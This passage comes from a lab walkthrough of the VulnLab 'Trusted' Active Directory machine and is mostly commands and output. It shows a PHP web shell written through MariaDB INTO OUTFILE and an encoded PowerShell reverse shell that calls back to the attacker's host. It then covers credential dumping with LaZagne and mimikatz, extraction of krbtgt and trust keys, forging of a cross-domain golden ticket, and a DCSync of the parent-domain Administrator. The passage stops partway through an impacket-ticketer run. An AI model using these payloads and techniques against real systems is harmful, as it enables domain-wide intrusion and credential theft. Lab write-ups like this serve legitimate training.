[*] Starting interaction with 2...

meterpreter > 

As we are Domain Admin then we can grab the Trusted_User flag:

meterpreter > pwd
C:\Windows\system32
meterpreter > cat C:\\Users\\Administrator\\Desktop\\User.txt
VL{349efd4b1ccbeb4d3ca0108fa5cc5802}

Alternative way (shortest path to cpowers)

As the mariadb port is open, the db is running as root and via the php info file we can write a web shell to our dev location then RCE.

Checked if we had the write privilege on the server, that should be as we are root on mariadb.

If secure_file_priv is empty that means we have both read and write privileges:

$ mysql -h lab.trusted.vl -u root -pSuperSecureMySQLPassw0rd1337. --skip_ssl   
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB mariadb.org binary distribution

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use news;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [news]> show variables like "secure_file_priv";
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.259 sec)

Write permission confirmed

We created a webshell in the root directory of the website:

MariaDB [news]> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/xampp/htdocs/dev/webshell.php';
Query OK, 1 row affected (0.266 sec)

OR

MariaDB [news]> select '<?php echo "command: " . system($_REQUEST["cmd"]); ?>' into outfile "C:\\xampp\\htdocs\\dev\\webshell.php";
Query OK, 1 row affected (0.266 sec)

Then use it to execute commands on the machine:

http://lab.trusted.vl/dev/webshell.php?cmd=whoami

image

We use our webshell to spawn a powershell reverse shell as nt authority\system.

Set a Netcat listener:

$ rlwrap -cAr nc -lvnp 4321
listening on [any] 4321 ...

We use RevShells to create a quick Base64 PoSH revershell:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADkAIgAsADQAMwAyADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

Then call it via our webshell:

http://lab.trusted.vl/dev/webshell.php?cmd=powershell%20-ep%20bypass%20-w%20hidden%20-enc%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AOAAuADIALgAxADkAIgAsADQAMwAyADEAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

image

Then get a shell as nt authority\system:

$ rlwrap -cAr nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.8.2.19] from (UNKNOWN) [10.10.137.70] 64456

PS C:\xampp\htdocs\dev> whoami
nt authority\system

Then able to grab the 1st flag:

PS C:\xampp\htdocs\dev> type C:\Users\Administrator\Desktop\User.txt
VL{349efd4b1ccbeb4d3ca0108fa5cc5802}

Credential dumping

We upload to the target and run LaZagne to retrieve some hashes:

[+] Shahash found !!!
Shahash: e845d39122d58246ff7e28a282e8ed0e19ede373
Nthash: 322db798a55f85f09b3d61b976a13c43
Login: cpowers

[+] Shahash found !!!
Shahash: 1e6c0983c20e8a56e1dba1e225b9dbe12c18cd2c
Nthash: 726725de0252ccbe1a009d04c36613e3
Login: LABDC$

With the machine Hash we can remote dump all other hashes:

$ nxc smb lab.trusted.vl -u 'LABDC$' -H '726725de0252ccbe1a009d04c36613e3' --sam

Domain Trusts breaking

As the domain trust is bidirectional between LabDC and TrustedDC, that means we can use kerberos service user from our current LAB.TRUSTED.VL (Child) to domain TRUSTED.VL (Parent) to craft a golden ticket and with this we can authenticate into the parent domain.

That means If I’m an administrator in Lab Domain I can execute commands on the TrustedDC Domain.

To exploit this we need 3 things:

  • KRBTGT NTLM hash
  • SID of Lab.Trusted.vl
  • SID of TrustedDC.Trusted.vl

Golden ticket - TRUSTEDDC (TRUSTED.VL\Administrator)

Check with Defender is enabled:

meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_execute 'Get-MpComputerStatus'
[+] Command execution completed:


AMEngineVersion                  : 1.1.19500.2
AMProductVersion                 : 4.18.2205.7
AMRunningMode                    : Normal
AMServiceEnabled                 : True
AMServiceVersion                 : 4.18.2205.7
AntispywareEnabled               : True
AntispywareSignatureAge          : 787
AntispywareSignatureLastUpdated  : 8/9/2022 11:52:21 PM
AntispywareSignatureVersion      : 1.373.80.0
AntivirusEnabled                 : True
AntivirusSignatureAge            : 787
AntivirusSignatureLastUpdated    : 8/9/2022 11:52:21 PM
AntivirusSignatureVersion        : 1.373.80.0
BehaviorMonitorEnabled           : False
ComputerID                       : 477AD867-01F0-4CA2-8098-022DBC1E5FD5
ComputerState                    : 0
DefenderSignaturesOutOfDate      : True
DeviceControlDefaultEnforcement  : Unknown
DeviceControlPoliciesLastUpdated : 10/5/2024 4:55:32 AM
DeviceControlState               : Disabled
FullScanAge                      : 4294967295
FullScanEndTime                  :
FullScanOverdue                  : False
FullScanRequired                 : False
FullScanSignatureVersion         :
FullScanStartTime                :
IoavProtectionEnabled            : False
IsTamperProtected                : False
IsVirtualMachine                 : True
LastFullScanSource               : 0
LastQuickScanSource              : 2
NISEnabled                       : False
NISEngineVersion                 : 0.0.0.0
NISSignatureAge                  : 4294967295
NISSignatureLastUpdated          :
NISSignatureVersion              : 0.0.0.0
OnAccessProtectionEnabled        : False
ProductStatus                    : 524384
QuickScanAge                     : 0
QuickScanEndTime                 : 10/5/2024 5:32:58 AM
QuickScanOverdue                 : False
QuickScanSignatureVersion        : 1.373.80.0
QuickScanStartTime               : 10/5/2024 5:32:34 AM
RealTimeProtectionEnabled        : False
RealTimeScanDirection            : 0
RebootRequired                   : False
TamperProtectionSource           : Signatures
TDTMode                          : N/A
TDTStatus                        : N/A
TDTTelemetry                     : N/A
TroubleShootingDailyMaxQuota     :
TroubleShootingDailyQuotaLeft    :
TroubleShootingEndTime           :
TroubleShootingExpirationLeft    :
TroubleShootingMode              :
TroubleShootingModeSource        :
TroubleShootingQuotaResetTime    :
TroubleShootingStartTime         :
PSComputerName                   :

AV is enabled but RealTimeProtection is disabled

Warning
  • All commands below not work in a WinRM session like Evil-WinRM!

Upload mimikatz to LABDC:

meterpreter > getuid
Server username: LAB\cpowers
meterpreter > cd c:\\windows\\tasks
meterpreter > pwd
c:\windows\tasks
meterpreter > mkdir 1
Creating directory: 1
meterpreter > cd 1
meterpreter > pwd
c:\windows\tasks\1

meterpreter > upload Mimikatz/x64/ c:\\windows\\tasks\\1
[*] uploading  : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimilib.dll -> c:\windows\tasks\1\mimilib.dll
[*] uploaded   : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimilib.dll -> c:\windows\tasks\1\mimilib.dll
[*] uploading  : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimikatz.exe -> c:\windows\tasks\1\mimikatz.exe
[*] uploaded   : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimikatz.exe -> c:\windows\tasks\1\mimikatz.exe
[*] uploading  : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimispool.dll -> c:\windows\tasks\1\mimispool.dll
[*] uploaded   : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimispool.dll -> c:\windows\tasks\1\mimispool.dll
[*] uploading  : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimidrv.sys -> c:\windows\tasks\1\mimidrv.sys
[*] uploaded   : /home/user/Downloads/VULNLAB/TRUSTED/Mimikatz/x64/mimidrv.sys -> c:\windows\tasks\1\mimidrv.sys
meterpreter > dir
Listing: c:\windows\tasks\1
===========================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  37208    fil   2024-10-05 14:35:56 +0900  mimidrv.sys
100777/rwxrwxrwx  1355264  fil   2024-10-05 14:35:53 +0900  mimikatz.exe
100666/rw-rw-rw-  37376    fil   2024-10-05 14:35:48 +0900  mimilib.dll
100666/rw-rw-rw-  10752    fil   2024-10-05 14:35:54 +0900  mimispool.dll

Get the KRBTGT NTLM hash:

meterpreter > shell
Process 4932 created.
Channel 14 created.
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

c:\windows\tasks\1>.\mimikatz.exe "privilege::debug" "lsadump::lsa /user:krbtgt /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::lsa /user:krbtgt /patch
Domain : LAB / S-1-5-21-2241985869-2159962460-1278545866

RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : c7a03c565c68c6fac5f8913fab576ebd

mimikatz(commandline) # exit
Bye!

Get SID of Lab.Trusted.vl and SID of TrustedDC.Trusted.vl:

c:\windows\tasks\1>.\mimikatz.exe "privilege::debug" "lsadump::trust /patch" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # lsadump::trust /patch

Current domain: LAB.TRUSTED.VL (LAB / S-1-5-21-2241985869-2159962460-1278545866)

Domain: TRUSTED.VL (TRUSTED / S-1-5-21-3576695518-347000760-3731839591)
 [  In ] LAB.TRUSTED.VL -> TRUSTED.VL
    * 10/5/2024 1:20:35 AM - CLEAR   - 89 4b 18 96 8b ec bf ad 2f a9 e0 f1 26 3f 94 41 b6 d4 5d 9b e6 c7 86 6b b0 c1 78 89 55 68 9d 50 54 92 8b 2b f3 ab 31 fc b3 40 3f 07 90 5d 9f 37 f9 33 ef 45 59 e8 87 88 2e d0 a9 b0 65 6f 58 5d 6b b6 a8 b6 14 d3 08 95 cb ad a6 10 30 54 08 e8 c5 73 49 a9 87 80 ea da 4a 04 e8 b3 4c 67 fb 6f 15 7d f6 9b f3 43 64 fd f1 a2 23 39 4f 3f 1b d5 de 74 60 fc 10 21 0d 5e 77 ba 4e 8b f5 db c2 4e a7 ae c9 38 8b 7e f4 60 1e 19 6a a5 7f 32 0a 86 14 76 75 a9 f9 7d 4d 29 3d a6 82 23 39 62 29 06 b2 93 37 ab 68 3f 54 07 d8 d9 b5 15 af ba bd 85 67 3c 13 48 92 34 bf c5 12 51 62 6a a0 99 22 70 ec 0e 14 88 e7 0e 8a 8c cf f7 3d 54 c8 a2 1d d9 29 5d d8 1b 1c ac 53 d3 55 7d f8 41 b1 0f d7 d5 27 35 6e 81 1e 2e 18 28 65 24 64 81 9f 8f ec 89 
	* aes256_hmac       aeb6c6824ccb0c68eded8aa8366721f2f8df63037cebb7bfbff2bc3520fa4f93
	* aes128_hmac       b722515be0dec7a35eee4e7ac7334e06
	* rc4_hmac_nt       a91e2ee093e8762fa60535d9766249d7

 [ Out ] TRUSTED.VL -> LAB.TRUSTED.VL
    * 10/5/2024 1:20:33 AM - CLEAR   - dc 17 2d 83 7d a9 21 77 52 2a 5e 0c 4a a9 79 bf 7e b6 7c 80 30 bd 04 64 fe 34 7f 6e 32 90 21 df 8d a5 a4 b5 82 b7 88 09 4e a1 8b d7 7c 0c bb 0e 3b fb 93 b6 82 b5 61 f9 ac 0f c4 88 43 66 1a f0 ff b7 6c ce 8c 81 79 de 2f 6d b3 97 e5 39 d5 e4 ba 3b 6e d6 04 36 92 f4 b6 e8 40 df e4 b6 08 01 99 a3 11 51 96 dd dc 2a 96 52 28 c2 10 0b 56 83 e3 8b 7e 18 8d d6 bd 52 fe 8e 09 9b 29 d6 a6 a6 9e 45 88 e1 d6 06 b1 5c 83 0d 57 c6 b6 fa b6 8c 91 5f ae c1 1f 3e 84 a7 df db 49 27 ed af ab 04 0f 6b 9e c0 81 80 ce de 12 50 cc c7 26 eb f2 55 a7 78 d9 47 dc 6a 60 2c b4 55 0d 4b c2 cb a5 47 c5 16 5b ee 08 6a 49 a6 da 8d 47 bb 51 6e da f1 6c 47 de fe 44 d8 f3 cc 43 3e c0 20 0b b4 a7 57 44 ad 67 ea 6e b1 f5 5f e2 21 c6 02 bb 00 ae b6 
	* aes256_hmac       e5f5711ed94741f558d068131cdaee5b40e2b39bdffed73fa28139ff3218ae11
	* aes128_hmac       cef91dbab67a98bb8467982191b894d1
	* rc4_hmac_nt       f54545970961dba26fa692174886b03d

 [ In-1] LAB.TRUSTED.VL -> TRUSTED.VL
    * 5/27/2023 4:19:25 PM - CLEAR   - ea 31 66 22 35 93 0e ef 05 dd e5 94 f0 70 b5 dd 2c de b4 ec 7a 47 73 ae 20 45 15 00 9c 0c 1a 7e 9a f4 68 c7 22 c9 d2 35 cb 67 bb 8d 56 7e 5b 9f 4e 9c b4 4c 77 a6 b7 41 2e d9 3d e4 87 73 5b ee 44 8b 4f 3f f3 e8 ac 32 21 08 db 79 9a 55 2b a0 6f c2 dd 69 c6 9a b7 4d e1 8a 4c f6 e8 0b 47 a9 cb cf 4d 6f 14 8c 28 44 66 63 85 20 13 3b c8 93 bd 20 38 ff 6c 73 d3 2a 61 a3 10 fc 2f d5 af 29 a8 5b 28 09 0d 1f 17 46 8d 7d 09 fa e8 55 61 2e d7 6b 3a 70 38 11 e0 42 08 4b 5b 2b be 53 2c 62 97 64 42 4e 11 fb 50 ed 2f ef 58 38 be 20 a4 4b f6 cf a7 45 18 73 56 be cd 6c 0a 78 16 f7 51 ae 82 59 95 7a 33 f0 27 a6 6d 08 62 ca 74 5f 82 13 c2 d2 aa 7b 12 96 b8 16 27 2e ee 48 bd e4 21 41 db a2 e2 92 ca f3 5d d6 76 cc b5 66 28 2a 87 92 
	* aes256_hmac       a7880265164670ddfc041c250bdf7d8166bf8ca0c06d86c3ddec12620fdfb800
	* aes128_hmac       9d59311c51bd3eb6cc846cf1af53c80f
	* rc4_hmac_nt       fdb9239325aed982da5f521116ffbcaf

 [Out-1] TRUSTED.VL -> LAB.TRUSTED.VL
    * 10/5/2024 1:20:33 AM - CLEAR   - 7a 6f b9 f0 49 87 53 be 90 63 63 9c d9 8e 15 f5 ce b5 60 98 6d e6 08 0f 7b ab 3a 7b e3 59 48 a4 f4 6e 6f 1a cc 87 f2 19 81 9a 3b e5 f6 b0 59 28 ad 97 e2 fd fb 39 f8 15 98 ca 4e a9 c4 04 60 15 6a ca 97 0e 20 81 77 42 ac c0 c9 0d 4f 49 4d 64 ee 2a 0f ed aa 4c f3 5b fb 51 ef 50 1a 84 5d 15 a8 9c ce a5 37 a7 02 47 ff 67 0d 1a 59 1c f6 c9 11 9f a2 55 7f c0 45 db 29 77 db 54 9e 46 23 ea 60 a3 9d 9c 11 61 44 51 d2 3f 32 cc e3 67 95 1c a5 0a 0f c6 96 3d e2 a3 53 2b 92 41 a2 a2 46 9e 27 65 c4 84 b0 6f 6e 4e 95 70 0e ed a6 a9 8e 1b ac 66 e8 40 61 9f 6e 70 44 6e b1 fc dd a7 72 9d 3e bd ac b7 0e b9 6b 3c a6 b5 a0 d2 9b 74 91 39 02 f8 7c 31 16 09 7c 52 f3 e9 00 3e 0c 88 46 a3 05 c6 5c 2b f9 3c 0c 21 bd b2 04 8b bc 8a b0 74 
	* aes256_hmac       bfc64ba951d28743ef247deb0fa7d69197b9fda301c64ae0765ba9c5c6418183
	* aes128_hmac       0fe86c75c4b6686fcae0bd01d0a1fa2c
	* rc4_hmac_nt       cddbd971c2e3e4ef64b4eb024e4e75c0


mimikatz(commandline) # exit
Bye!

OR

c:\windows\tasks\1>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\windows\tasks\1> Get-ADGroup -Filter {name -eq "Enterprise Admins"} -Server trusted.vl
Get-ADGroup -Filter {name -eq "Enterprise Admins"} -Server trusted.vl


DistinguishedName : CN=Enterprise Admins,CN=Users,DC=trusted,DC=vl
GroupCategory     : Security
GroupScope        : Universal
Name              : Enterprise Admins
ObjectClass       : group
ObjectGUID        : 9e72548e-1fda-486c-b426-6bcb7f171253
SamAccountName    : Enterprise Admins
SID               : S-1-5-21-3576695518-347000760-3731839591-519

We have all needs to forge our Golden ticket for enterprise domain admin:

In the current session (local):

c:\windows\tasks\1>.\mimikatz.exe "privilege::debug" "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbi" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ticket:C:\Users\Administrator\Documents\ticket.kirbi
User      : Administrator
Domain    : lab.trusted.vl (LAB)
SID       : S-1-5-21-2241985869-2159962460-1278545866
User Id   : 500
Groups Id : *513 512 520 518 519 
Extra SIDs: S-1-5-21-3576695518-347000760-3731839591-519 ; 
ServiceKey: c7a03c565c68c6fac5f8913fab576ebd - rc4_hmac_nt      
Lifetime  : 10/5/2024 6:18:39 AM ; 10/3/2034 6:18:39 AM ; 10/3/2034 6:18:39 AM
-> Ticket : C:\Users\Administrator\Documents\ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz(commandline) # exit
Bye!

Then use the ticket to retrieve the hash of the admin user (target domain sid + 500):

c:\windows\tasks\1>.\mimikatz.exe "privilege::debug" "kerberos::ptt C:\users\administrator\documents\ticket.kirbi" "lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # kerberos::ptt C:\users\administrator\documents\ticket.kirbi

* File: 'C:\users\administrator\documents\ticket.kirbi': OK

mimikatz(commandline) # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /user:S-1-5-21-3576695518-347000760-3731839591-500
[DC] 'trusted.vl' will be the domain
[DC] 'trusteddc.trusted.vl' will be the DC server
[DC] 'S-1-5-21-3576695518-347000760-3731839591-500' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   : 1/1/1601 12:00:00 AM
Password last change : 9/18/2022 8:50:53 PM
Object Security ID   : S-1-5-21-3576695518-347000760-3731839591-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 0: 15db914be1e6a896e7692f608a9d72ef
    ntlm- 1: 86a9ee70dfd64d20992283dc5721b475
    lm  - 0: 1a28b083f0e83167bec07d185d492a67

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 7ad3ac096b425259c12c6cade75241c9

* Primary:Kerberos-Newer-Keys *
    Default Salt : TRUSTED.VLAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d75ec7df1acac724a6dfc250e707aab3492b6d9936b9898f742781b0a871d4a6
      aes128_hmac       (4096) : 1cee32af6e8cd27059d855e6c6b4d5ec
      des_cbc_md5       (4096) : aed5e385512c685e
    OldCredentials
      aes256_hmac       (4096) : 11b39019ac5f9715327f55a1b44820da82e32b14ce2dd40f142192f4eeab1336
      aes128_hmac       (4096) : c88a36f9c11a83c13a03f3d48aae78a4
      des_cbc_md5       (4096) : 2fe99be0a82c49d0
    OlderCredentials
      aes256_hmac       (4096) : c88291723e622259b4a930eec2c087348c258a09d5720fdb11625fd6432057f8
      aes128_hmac       (4096) : c803feb47873e961875882b3909edd2b
      des_cbc_md5       (4096) : 292ab5329be9ce40

* Primary:Kerberos *
    Default Salt : TRUSTED.VLAdministrator
    Credentials
      des_cbc_md5       : aed5e385512c685e
    OldCredentials
      des_cbc_md5       : 2fe99be0a82c49d0

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  78a97cd0944c04736ebc5c6a41151044
    02  9f038aad902811d760f8ab1870ec8817
    03  8b69a5557480678e214f7fcf8a1b5299
    04  78a97cd0944c04736ebc5c6a41151044
    05  a02112deac62e4ac6f5ae005e80dca33
    06  524fdfa5abe0491f80ea30779ccc4673
    07  b8c416ff7f3b06308bdb914e5e974489
    08  01e3d6cffddd4bd9e9b6ae361e226569
    09  2d423b7e046d43c0e78e19f1d2cf3788
    10  98014f1215b902e6215f97ec52ba4915
    11  762701fd0c34e1f70c11fdb4378e9d3d
    12  01e3d6cffddd4bd9e9b6ae361e226569
    13  61f7063f23adab72b60fded48fbf2854
    14  d5c36527291c60a7ccd2fa4f214f36cc
    15  553607358db97eb65e234bf8aeb52e8d
    16  a8d4e1e3131446e6d000597a03727854
    17  dbf6bf6fad3583eb2bc387a540a3cf68
    18  fe8bb83ce7236f88c86ee1f56cb198bd
    19  b0bdc788c9df34f4d7b0ae9ecb970cc0
    20  df0e59fd58ada70c2c61de837652a72f
    21  035f102a7c5c5159054e450924b0a326
    22  0f8c9e30d9e9066376e868dc60178b7f
    23  c65977b340f78e2a1ff601035748959b
    24  4a3f6237a32c525029e3d2cf0cc4f51d
    25  7791924095599f3112d1156fa93e65c2
    26  c8377915d36d8bdd86925c1da86ebe04
    27  655f04c5a10c8045ec789ae964093ccf
    28  7e1eee2805079de9885d2c2957285a6e
    29  c10f5a9d43d4cc149bed1e98df67d560


mimikatz(commandline) # exit
Bye!

Found TRUSTED.VL\Administrator:15db914be1e6a896e7692f608a9d72ef

OR

Out fo box in our attacker machine (remote):

$ impacket-ticketer -nthash c7a03c565c68c6fac5f8913fab576ebd -domain-sid S-1-5-21-2241985869-2159962460-1278545866 -extra-sid S-1-5-21-3576695518-347000760-3731839591-519 -domain lab.trusted.vl Administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:139: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for lab.trusted.vl/Administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:598: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:716: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:717: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
